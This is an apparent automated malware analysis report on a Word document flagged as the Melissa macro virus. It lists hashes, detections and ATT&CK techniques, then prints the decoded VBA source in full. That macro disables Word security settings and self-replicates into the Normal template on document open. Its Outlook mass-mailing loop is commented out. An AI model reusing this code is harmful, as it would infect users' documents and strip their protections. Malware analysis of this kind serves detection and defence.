Win.Trojan.Psycho-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 cf2504f4e7c1242c…

MALICIOUS

Office (OLE)

37.5 KB Created: 1999-09-09 14:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 23693227235f4116d6d1669aba16efa8 SHA-1: b275645a1bed7c253cff6e0af46984d5cc67c49f SHA-256: cf2504f4e7c1242c0d86a2591bcec368b20768bd72bb78df8dc0ab63bd40cad9
260 Risk Score

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains a VBA macro that executes automatically via the Document_Open subroutine. This macro attempts to use Outlook to send copies of itself to contacts found in the user's address book, a common tactic for worm-like malware. The ClamAV detection of 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Melissa-4' strongly suggests a known malware family associated with mass-mailing capabilities.

Heuristics 5

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12634 bytes
SHA-256: 22a394e2f413fb3839fa020447b5054178e1322fdc182f574170bf87381166e9
Detection
ClamAV: Doc.Trojan.Melissa-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = True
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
    CommandBars("Tools").Controls("Macro").Enabled = True
    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
'    For y = 1 To DasMapiName.AddressLists.Count
'        Set AddyBook = DasMapiName.AddressLists(y)
'        x = 1
'        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
''        For oo = 1 To AddyBook.AddressEntries.Count
''            Peep = AddyBook.AddressEntries(x)
''            BreakUmOffASlice.Recipients.Add Peep
''            x = x + 1
''            If x > 50 Then oo = AddyBook.AddressEntries.Count
''         Next oo
''         BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
' '        BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
'  '       BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
'  '       BreakUmOffASlice.Send
'   '      Peep = ""
'    Next y
'DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
End Sub


' Processing file: /opt/analyzer/scan_staging/352dc0551a374b85ac3e7e5b69108f00.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Melissa - 6806 bytes

... (truncated)